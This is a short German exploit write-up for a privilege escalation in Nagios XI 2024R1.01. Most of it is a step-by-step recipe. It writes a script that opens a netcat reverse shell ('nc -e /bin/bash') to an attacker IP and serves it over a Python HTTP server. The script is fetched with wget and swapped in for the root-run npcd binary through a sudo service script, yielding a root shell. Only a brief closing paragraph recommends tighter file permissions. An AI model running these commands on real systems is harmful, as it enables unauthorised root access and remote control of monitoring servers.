
Privilegienerweiterung in Nagios 2024R1.01
CVE entdeckt von: Jarod Jaslow (MAWK)
Erstellen Sie als Benutzer "NAGIOS" eine Datei auf der Angreifermaschine mit folgendem Inhalt:
#!/bin/bash
nc -e /bin/bash <Attacker IP> 4445

Hosten Sie die Datei auf der Angreifermaschine über einen Python-HTTP-Server:
python3 -m http.server 8000

Starten Sie einen Netcat (NC)-Server im Listen-Modus auf der Angreifermaschine:
nc -nlvp 4445

Holen Sie die Datei von der Angreifermaschine:
wget http://<Attacker IP>:8000/npcd

Führen Sie die folgenden Befehle aus, um die Privilegien auszuweiten und eine Verbindung als Root zu erhalten:
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
cp npcd /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd


Es wird empfohlen, die Fähigkeit des Benutzers "NAGIOS" einzuschränken, in die als Root ausgeführten ausführbaren Dateien der Nagios-Dienste zu schreiben. Dies kann durch strengere Dateiberechtigungen und Zugriffskontrollen für die relevanten Verzeichnisse und Dateien erreicht werden, die mit den Nagios-Diensten verbunden sind.
Dies sollte in neuen Versionen behoben werden
CVE: